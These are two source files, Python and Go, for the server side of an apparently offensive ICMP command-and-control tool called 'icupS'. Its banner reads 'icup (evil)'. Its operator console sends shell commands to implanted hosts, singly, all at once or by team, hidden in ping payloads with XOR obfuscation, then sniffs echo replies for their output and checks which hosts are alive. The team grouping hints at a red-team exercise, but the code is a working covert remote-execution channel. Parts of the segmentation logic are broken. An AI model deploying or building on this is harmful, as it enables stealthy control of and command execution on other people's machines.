File: icupS.py
from scapy.all import * 
from scapy.all import ICMP,IP
import json
import threading

# STILL IN PRODUCTION

DEBUG = True                   # Set to display statements after command execution
DEVDEBUG = False               # Set to display statements specific to debugging issues
JSONFILE = "example.json"      # Set to point to configuration files with loadclients
SuperSecretMode = False         # Enables "encryption"
KEY = "B"
CLOUD = "172"
LAN = "10"

def print_title(): 
    print(".__                          ___             .__.__    ___") 
    print("|__| ____  __ ________      /  /   _______  _|__|  |   \  \\") 
    print("|  _/ ___\|  |  \____ \    /  /  _/ __ \  \/ |  |  |    \  \\")  
    print("|  \  \___|  |  |  |_> >  (  (   \  ___/\   /|  |  |__   )  )") 
    print("|__|\___  |____/|   __/    \  \   \___  >\_/ |__|____/  /  /")  
    print("        \/      |__|        \__\      \/               /__/") 

def print_help():
    print("\taddclient <IP_ADDRESS>   Adds new client by IP")
    print("\tls                       Show all added clients")
    print("\tremoveclient <ID>        Removes a client by ID")
    print("\tremoveallclients         Removes all clients")
    print("\tsend <ID> <message>      Send message to client at ID")
    print("\texe <ID> <command>       Send command to client at ID")
    print("\tsendtoall <message>      Sends <message> to all clients")
    print("\texeonall <command>       Execute <command> on all clients")
    print("\tloadclients              Loads all clients specified in JSONFILE")
    # print("\tshell <ID>               Creates a direct line with client at ID")
    print("\tkill                     Stops server")
    print("\tssm                      Enables Super Secret Mode")                    
    print("\thelp                     Prints this")

# Add clients to the dictionary of clients, the IP from arguments, and the id
def addclient(clients, arguments, id):
    clients[id] = arguments[1] 
    if DEBUG: print(f"[DEBUG] Client {id} added at {clients.get(id)}") 
    id += 1
    return id

# Add clients with the JSON configuration
def json_add_client(ip, clients, id):
    clients[id] = ip
    if DEBUG: print(f"[DEBUG] Client {id} added at {clients.get(id)}")
    id += 1
    return id

# Show all clients within the client dictionary 
def showclients(clients):
    for client in clients:
        print(f"Client {client} at {clients.get(client)}")

# Remove the client by client ID
def removeclient(arguments, clients):
    if len(arguments)<2: 
        print("[ERROR] Specify client by ID")
    else:
        if DEBUG: print(f"[DEBUG] Client {arguments[1]} removed from {clients.get(int(arguments[1]))}") 
        clients.pop(int(arguments[1]))

# Remove all clients within the client dictionary
def removeallclients(clients):
    clients.clear()
    if DEBUG: print(f"[DEBUG] All clients removed")

# Send command to client by ID via ICMP data, max of 1472 data bytes
def send_command(arguments, clients, execute):
    global SuperSecretMode
    try:
        clientcommand = arguments[1] 
        clienttokens = clientcommand.split(" ", 1)
        if clients.get(int(clienttokens[0])) != None:
            if DEVDEBUG: print(len(clienttokens[1].encode('utf-8')))

            # TODO FOR PACKET SEGMENTATION
            # if len(clienttokens[1].encode('utf-8')) > 1469:
            #     piece = clienttokens[1][:1469]
            #     segment = "!!!" + piece 
            #  segments = len(clienttokens[1].encode('utf-8'))//1469
            # if DEVDEBUG: print(segments)

            send_over_icmp(clients.get(int(clienttokens[0])), clienttokens[1], execute)
            if DEBUG and SuperSecretMode: print(f"[DEBUG] \"{clienttokens[1]}\" sent to {clienttokens[0]} at {clients.get(int(clienttokens[0]))} (Super Secretly)")
            if DEBUG and not SuperSecretMode: print(f"[DEBUG] \"{clienttokens[1]}\" sent to {clienttokens[0]} at {clients.get(int(clienttokens[0]))}")
        else:
            print(f"[ERROR] No client at ID {clienttokens[0]}")
    except:
        print("[ERROR] Usage: send <ID> <message>")

# "Encryption" for SuperSecretMode
def encrypt_decrypt(plaintext):
    encrypted = ""
    for i in range(len(plaintext)):
        encrypted += chr(ord(plaintext[i]) ^ ord(KEY)) 
    return encrypted

# Send the command and add header
def send_over_icmp(clientip, command, execute):
    global SuperSecretMode
    encrypted = encrypt_decrypt(command)
    if execute:
        if SuperSecretMode:
            clientcommand = "!!!$1" + encrypted
        else:
            clientcommand = "!!!01" + command         
    else:
        if SuperSecretMode:
            clientcommand = "!!!$0" + encrypted
        else:
            clientcommand = "!!!00" + command
    
    evil = IP(dst=clientip)/ICMP(type=8)/(clientcommand)
    send(evil)

# TODO Execute on all clients
# Send command to all clients
def sendtoall(arguments, clients, execute):
    global SuperSecretMode
    if len(arguments)<2 or arguments[1] == "": 
        print("[ERROR] Usage: sendtoall <message>")
    else:
        for client in clients:
            send_over_icmp(clients.get(client), arguments[1], execute)
            if DEBUG and SuperSecretMode: print(f"[DEBUG] \"{arguments[1]}\" sent to {client} at {clients.get(client)} (Super Secretly)")
            elif DEBUG: print(f"[DEBUG] \"{arguments[1]}\" sent to {client} at {clients.get(client)}")

def exeonall(arguments, clients, execute):
    global SuperSecretMode
    if len(arguments)<3 or arguments[1] == "": 
        print("[ERROR] Usage: exeonall <message>")
    else:
        for client in clients:
            send_over_icmp(clients.get(client), arguments[1], execute)
            if DEBUG and SuperSecretMode: print(f"[DEBUG] \"{arguments[1]}\" sent to {client} at {clients.get(client)} (Super Secretly)")
            elif DEBUG: print(f"[DEBUG] \"{arguments[1]}\" sent to {client} at {clients.get(client)}")

def exeonteam(arguments, clients, execute):
    global SuperSecretMode
    if len(arguments)<2: 
        print("[ERROR] Usage: exeonteam <team> <message>")
    else:
        for client in clients:
            octets = clients.get(client).split('.')
            if octets[0] == LAN:
                if str(arguments[1][0]) == str(octets[1]):
                    send_over_icmp(clients.get(client), arguments[1], execute)
                    if DEBUG and SuperSecretMode: print(f"[DEBUG] \"{arguments[1]}\" sent to {client} at {clients.get(client)} (Super Secretly)")
                    elif DEBUG: print(f"[DEBUG] \"{arguments[1]}\" sent to {client} at {clients.get(client)}")
            if octets[0] == CLOUD:
                if str(arguments[1][0]) == str(octets[2]):
                    send_over_icmp(clients.get(client), arguments[1], execute)
                    if DEBUG and SuperSecretMode: print(f"[DEBUG] \"{arguments[1]}\" sent to {client} at {clients.get(client)} (Super Secretly)")
                    elif DEBUG: print(f"[DEBUG] \"{arguments[1]}\" sent to {client} at {clients.get(client)}")

# TODO Repair or remove
# # Place icupS into single client mode
# def shell(clients, arguments):
#     print("Type \"kill\" to exit")
#     while(True):
#         command = input(f"{clients.get(int(arguments[1]))} >> ")
#         if command == "kill":
#             break
#         send_over_icmp(clients.get(arguments[1]), command)
#         if DEBUG: print(f"[DEBUG] \"{command}\" sent to {arguments[1]} at {clients.get(int(arguments[1]))}")

# Checks if an IP is valid
def valid_IP(arguments):
    a = arguments[1].split('.')
    if len(a) != 4:
        return False
    for x in a:
        if not x.isdigit():
            return False
        i = int(x)
        if i < 0 or i > 255:
            return False
    return True

# Create clients based on JSON file
def generate_targets(JSONFILE, clients, id):
    f = open(JSONFILE, 'r')
    data = json.loads(f.read())
    for jsonip in data:
        ip = data[jsonip]
        id = json_add_client(ip, clients, id)
    f.close()
    return id

# TODO Parse newlines from output
def listen(pkt):
    src = pkt[IP].dst 
    payload = str(pkt.payload)
    parsed = re.split('#{3}', payload)
    if len(parsed) == 1:
        return
    else:
        command = parsed[1][:-1]
        if command[0] == "$":
            output = encrypt_decrypt(command[1:])
            newlineparsed = output.replace("\\\\n","\n")
            print(f"Recieved:\n\t{newlineparsed} from {src}")

        else: 
            newlineparsed = command[2:].replace("\\\\n","\n")
            print(f"Recieved:\n\t{command[0:2]} {newlineparsed} from {src}")

        

def sniffer():
    sniff(filter="icmp[icmptype] == icmp-echoreply", prn=listen)

def change_ssm():
    global SuperSecretMode
    if SuperSecretMode: 
        SuperSecretMode = False
        print("SSM Disabled")
    else: 
        SuperSecretMode = True
        print("SSM Enabled")

def main():
    print_title()
    print("Enter command to begin, or \"help\" for help:")
    threading.Thread(target=sniffer, daemon=True).start()
    clients = dict()
    id = 0
    while(True):
        command = input(">> ")
        arguments = command.split(" ", 1)
        if arguments[0] == "":
            continue
        elif arguments[0] == "addclient":
            if len(arguments)<2: 
                print("[ERROR] Missing client IP field")
                continue
            if valid_IP(arguments): 
                id = addclient(clients, arguments, id)
            else:
                print("[ERROR] Invalid IP Address")
        elif arguments[0] == "ls":
            showclients(clients)
        elif arguments[0] == "removeclient":
            removeclient(arguments, clients)
        elif arguments[0] == "removeallclients":
            removeallclients(clients)
        elif arguments[0] == "exe":
            send_command(arguments, clients, execute=True)
        elif arguments[0] == "send":
            send_command(arguments, clients, execute=False)
        elif arguments[0] == "sendtoall":
            sendtoall(arguments, clients, execute=False)
        elif arguments[0] == "exeonall":
            exeonall(arguments, clients, execute=True)
        elif arguments[0] == "sendtoteam":
            exeonteam(arguments, clients, execute=False)
        elif arguments[0] == "exeonteam":
            exeonteam(arguments, clients, execute=True)
        elif arguments[0] == "loadclients":
            id = generate_targets(JSONFILE, clients, id)
        # elif arguments[0] == "shell":  [DONT WORRY ABOUT IT]
        #     shell(clients, arguments)
        elif arguments[0] == "kill":
            print_title()
            break
        elif arguments[0] == "ssm":
            change_ssm()
        elif arguments[0] == "help":
            print_help()
        else:
            print("Invalid option, use \"help\" for available commands")


if __name__ == "__main__":
    main()

File: iGOp/server/icupS.go
package main

import (
	"bufio"
	"bytes"
	"fmt"
	"log"
	"net"
	"os"
	"sort"
	"strconv"
	"strings"
	"time"

	"github.com/google/gopacket"
	"github.com/google/gopacket/layers"
	"github.com/google/gopacket/pcap"
	"golang.org/x/net/icmp"
	"golang.org/x/net/ipv4"
)

// var clients []client

// type client struct {
// 	name string
// 	id   int
// 	ip   string
// }

var DEBUG bool = true

var id int = 0
var clients = make(map[int]string)
var ALIVE = make(map[string]bool)
var SSM bool = true
var execute = false
var PACKETQUEUE []icmp.Message
var KEY rune = 'b'
var TEAMSIZE = 5

var (
	buffer = int32(1600)
	filter = "icmp[icmptype] == icmp-echoreply"
)

const (
	ProtocolICMP = 1
)

func print_title() {
	fmt.Println(".__                          ___             .__.__    ___")
	fmt.Println("|__| ____  __ ________      /  /   _______  _|__|  |   \\  \\")
	fmt.Println("|  _/ ___\\|  |  \\____ \\    /  /  _/ __ \\  \\/ |  |  |    \\  \\")
	fmt.Println("|  \\  \\___|  |  |  |_> >  (  (   \\  ___/\\   /|  |  |__   )  )")
	fmt.Println("|__|\\___  |____/|   __/    \\  \\   \\___  >\\_/ |__|____/  /  /")
	fmt.Println("        \\/      |__|        \\__\\      \\/               /__/")
	fmt.Println("Type \"help\" for list of commands.")

}

func print_help() {
	fmt.Println("\tadd <IP ADDRESS>             Adds new client by IP")
	fmt.Println("\tls                           Show all added clients")
	fmt.Println("\trm <ID>                      Removes a client by ID")
	fmt.Println("\tremoveallclients             Removes all clients")
	fmt.Println("\tsend <ID> <message>          Send message to client at ID")
	fmt.Println("\texe <ID> <command>           Send command to client at ID")
	fmt.Println("\tsendtoall <message>          Sends <message> to all clients")
	// fmt.Println("\texeonall <command>           Execute <command> on all clients")
	// fmt.Println("\tsendtoteam <team> <command>  Send <command> to all <team> clients")
	// fmt.Println("\texeonteam <team> <command>   Execute <command> on all <team> clients")
	// fmt.Println("\tloadclients                  Loads all clients specified in JSONFILE")
	fmt.Println("\tcheckalive                   Generates a board of replying clients")
	// [FIX]fmt.Println("\tshell <ID>                   Creates a direct line with client at ID")
	fmt.Println("\tkill                         Stops server")
	fmt.Println("\tssm                          Toggles Super Secret Mode")
	fmt.Println("\tdebug                        Toggles Debug")
	fmt.Println("\thelp                         Prints this")
}

func addclient(ip string) {
	clients[id] = ip
	id += 1
}

func removeclient(id int) {
	if _, ok := clients[id]; ok {
		if DEBUG {
			fmt.Println("Removing client", id)
		}
		delete(clients, id)
	} else {
		fmt.Println("Client does not exist.")
	}
}

func removeallclients() {
	for k := range clients {
		delete(clients, k)
	}
}

func showclients() {
	keys := make([]int, 0, len(clients))
	for k := range clients {
		keys = append(keys, k)
	}
	sort.Ints(keys)
	for _, k := range keys {
		fmt.Println("Client ", k, " at ", clients[k])
	}
}

func generate_header(segment int, segmented bool) string {
	segHeader := strconv.Itoa(segment)
	header := "!!!"
	// ### is server flag, value 1 (SSM) is Encryption option, 2 is execution option
	// 3 is segment for oversized packets, 4 is segment ID
	if SSM {
		header += "1"
	} else {
		header += "0"
	}
	if execute {
		header += "1"
	} else {
		header += "0"
	}
	if segmented {
		header += "1"
	} else {
		header += "0"
	}
	header += segHeader
	return header
}

func generate_packet(payload string, segment int) {
	PACKETQUEUE = make([]icmp.Message, (len(payload)/1460)+1)
	byteSize := len(payload)
	// Recursivly calls generate packet if too large
	if byteSize > 1460 {
		fmt.Println("Conductor we have a problem!!!!!")
		payload = payload[0:1460]
		nextPayload := payload[1460:byteSize]
		if SSM {
			payload = encrypt_decrypt(payload)
		}
		packet := icmp.Message{
			Type: ipv4.ICMPTypeEcho, Code: 0,
			Body: &icmp.Echo{
				ID: os.Getpid() & 0xffff, Seq: 1,
				Data: []byte(generate_header(segment, true) + payload),
			},
		}
		fmt.Println(len(PACKETQUEUE))
		PACKETQUEUE[segment] = packet
		generate_packet(nextPayload, segment+1)
	} else {
		// Packet if no segmentation is needed
		if SSM {
			payload = encrypt_decrypt(payload)
		}
		packet := icmp.Message{
			Type: ipv4.ICMPTypeEcho, Code: 0,
			Body: &icmp.Echo{
				ID: os.Getpid() & 0xffff, Seq: 1,
				Data: []byte(generate_header(segment, false) + payload),
			},
		}
		fmt.Println(len(PACKETQUEUE))
		PACKETQUEUE[segment] = packet
	}
}

func send_packets(addr string, c icmp.PacketConn) {
	for _, packet := range PACKETQUEUE {
		// fmt.Println("Packet:", addr)
		binaryEncoding, _ := packet.Marshal(nil)
		dst, _ := net.ResolveIPAddr("ip4", addr)
		anInt, err := c.WriteTo(binaryEncoding, dst)

		if err != nil {
			fmt.Println("I FAILED DOG")
		} else if anInt != len(binaryEncoding) {
			fmt.Println("YOU FELL OFF")
		}
	}
}

func sendmessage(command string, clientid int, c icmp.PacketConn) {
	execute = false
	ipaddr := strings.TrimRight(clients[clientid], "\r\n")
	generate_packet(command, 0)
	if DEBUG {
		fmt.Println("[DEBUG] ", command, " sent to ", clients[clientid])
	}
	send_packets(ipaddr, c)
}

func load() {
	readFile, err := os.Open("targets.txt")

	if err != nil {
		fmt.Println(err)
	}
	fileScanner := bufio.NewScanner(readFile)

	fileScanner.Split(bufio.ScanLines)

	for fileScanner.Scan() {
		addclient(fileScanner.Text())
	}
}

func checkalive(src net.IP, payload string) {
	if payload == "$pong" {
		ALIVE[src.String()] = true
		fmt.Println("[ALIVE]")

	} else {
		ALIVE[src.String()] = false
	}
}

func showalive() {
	fmt.Println()

	keys := make([]int, 0, len(ALIVE))
	tf := make(map[int]bool)

	for aclient, avar := range ALIVE {
		if avar == true {
			for clientid, clientip := range clients {
				if clientip == aclient {
					// coded := "\033[92m[" + strconv.Itoa(clientid) + "]\033[0m"
					keys = append(keys, clientid)
					tf[clientid] = true
					// fmt.Printf("\033[92m[%d]\033[0m ", clientid)
				}
			}
		} else {
			for clientid, clientip := range clients {
				if clientip == aclient {
					// coded := "\033[91m[" + strconv.Itoa(clientid) + "]\033[0m"
					keys = append(keys, clientid)
					tf[clientid] = false
					// fmt.Printf("\033[91m[%d]\033[0m ", clientid)
				}
			}
		}
	}
	sort.Ints(keys)
	teamnumber := 1
	fmt.Printf("Team %d:", teamnumber)
	for _, value := range keys {
		if value%TEAMSIZE == TEAMSIZE-1 && value != 4 {
			teamnumber += 1
			fmt.Printf("\nTeam %d:", teamnumber)
		}
		if tf[value] == true {
			if value < 10 {
				fmt.Printf("\033[92m[ %s]\033[0m", strconv.Itoa(value))
			} else {
				fmt.Printf("\033[92m[%s]\033[0m", strconv.Itoa(value))
			}
		} else {
			if value < 10 {
				fmt.Printf("\033[91m[ %s]\033[0m", strconv.Itoa(value))
			} else {
				fmt.Printf("\033[91m[%s]\033[0m", strconv.Itoa(value))
			}
		}

	}

	fmt.Println()
}

func deviceExists(name string) bool {
	devices, err := pcap.FindAllDevs()
	if err != nil {
		log.Panic(err)
	}
	for _, device := range devices {
		if device.Name == name {
			return true
		}
	}
	return false
}

func sniffer() {
	handler, err := pcap.OpenLive("ens160", buffer, false, pcap.BlockForever)
	if err != nil {
		log.Fatal(err)
	}
	defer handler.Close()
	if err := handler.SetBPFFilter(filter); err != nil {
		log.Fatal(err)
	}
	source := gopacket.NewPacketSource(handler, handler.LinkType())
	for packet := range source.Packets() {
		payload := convert(packet.ApplicationLayer().Payload())
		header := payload[0:7]
		if strings.HasPrefix(header, "###") {
			payload = payload[7:]

			ipLayer := packet.Layer(layers.LayerTypeIPv4)
			ip, _ := ipLayer.(*layers.IPv4)

			if SSM {
				payload = encrypt_decrypt(payload)
			}
			fmt.Print((payload), " received from ", ip.DstIP)
			checkalive(ip.DstIP, payload)

		} else {
			continue
		}
	}
}

func convert(nums []byte) string {
	var converted string
	converted = bytes.NewBuffer(nums).String()
	return converted
}

func parse_id(id string) int {
	atoiclient, _ := strconv.Atoi(strings.TrimRight(id, "\r\n"))
	return atoiclient
}

func parse_string(unparsed string) string {
	parsed := strings.TrimRight(unparsed, "\r\n")
	return parsed
}

func encrypt_decrypt(plaintext string) string {
	encrypted := ""
	for i := range plaintext {
		encrypted += string(rune(int(plaintext[i]) ^ int(KEY)))
	}
	return encrypted
}

func toggle_ssm() {
	if SSM {
		SSM = false
		fmt.Println("SSM Disabled")
	} else {
		SSM = true
		fmt.Println("SSM Enabled")
	}
}

func toggle_debug() {
	if DEBUG {
		DEBUG = false
		fmt.Println("DEBUG Disabled")
	} else {
		DEBUG = true
		fmt.Println("DEBUG Enabled")
	}
}

func checkIPAddress(host string) bool {
	parts := strings.Split(host, ".")
	if len(parts) < 4 {
		return false
	}
	for _, x := range parts {
		if i, err := strconv.Atoi(x); err == nil {
			if i < 0 || i > 255 {
				return false
			}
		} else {
			return false
		}
	}
	return true
}

func main() {
	print_title()
	// print_help()
	// addclient("127.0.0.1")
	// addclient("127.0.0.2")
	// showclients()
	var ListenAddr = "0.0.0.0"
	c, err := icmp.ListenPacket("ip4:icmp", ListenAddr)
	if err != nil {
		fmt.Println(err)
	}
	go sniffer()
	// devices, _ := pcap.FindAllDevs()
	// for _, device := range devices {
	// 	fmt.Println(device.Name)
	// }

	for {
		consoleReader := bufio.NewReader(os.Stdin)
		fmt.Print(">> ")

		input, _ := consoleReader.ReadString('\n')

		if strings.HasPrefix(input, "add") {
			tokens := strings.Split(input, " ")
			fmt.Println(tokens[1])
			if checkIPAddress(parse_string(tokens[1])) {
				addclient(parse_string(tokens[1]))
			} else {
				fmt.Println("Invalid IP address.")
			}

		} else if strings.HasPrefix(input, "rm") {
			tokens := strings.Split(input, " ")
			id := parse_id(tokens[1])
			removeclient(id)

		} else if strings.HasPrefix(input, "removeallclients") {
			removeallclients()

		} else if strings.HasPrefix(input, "ls") {
			showclients()

		} else if strings.HasPrefix(input, "sendtoall") {
			_, command, _ := strings.Cut(input, " ")
			command = strings.TrimRight(command, "\r\n")
			fmt.Println("[BEFORE]", command)
			for k := range clients {
				sendmessage(command, k, *c)
			}

		} else if strings.HasPrefix(input, "send") {
			_, after, _ := strings.Cut(input, " ")
			id, command, _ := strings.Cut(after, " ")
			clientid := parse_id(id)
			command = strings.TrimRight(command, "\r\n")
			if _, ok := clients[clientid]; ok {
				sendmessage(command, clientid, *c)
			} else {
				fmt.Println("Invalid Client")
				continue
			}

		} else if strings.HasPrefix(input, "exe") {
			_, after, _ := strings.Cut(input, " ")
			id, command, _ := strings.Cut(after, " ")
			clientid := parse_id(id)
			if _, ok := clients[clientid]; ok {
				command = strings.TrimRight(command, "\r\n")
				execute = true
				ipaddr := strings.TrimRight(clients[clientid], "\r\n")
				generate_packet(command, 0)
				if DEBUG {
					fmt.Print("[DEBUG] ", command, " executed on ", clients[clientid])
				}
				send_packets(ipaddr, *c)
			} else {
				fmt.Println("Invalid Client")
				continue
			}

		} else if strings.HasPrefix(input, "checkalive") {

			for _, client := range clients {
				ALIVE[client] = false
			}
			for id := range clients {
				sendmessage("ping", id, *c)
			}
			time.Sleep(7000 * time.Millisecond)
			showalive()

		} else if strings.HasPrefix(input, "load") {
			load()

		} else if strings.HasPrefix(input, "help") {
			print_help()

		} else if strings.HasPrefix(input, "ssm") {
			toggle_ssm()

		} else if strings.HasPrefix(input, "debug") {
			toggle_debug()

		} else if strings.HasPrefix(input, "kill") {
			print_title()
			os.Exit(0)

		} else if input == "" {
			continue

		} else {
			fmt.Println("Enter 'help' for commands or 'kill' to terminate.")
		}
	}
}
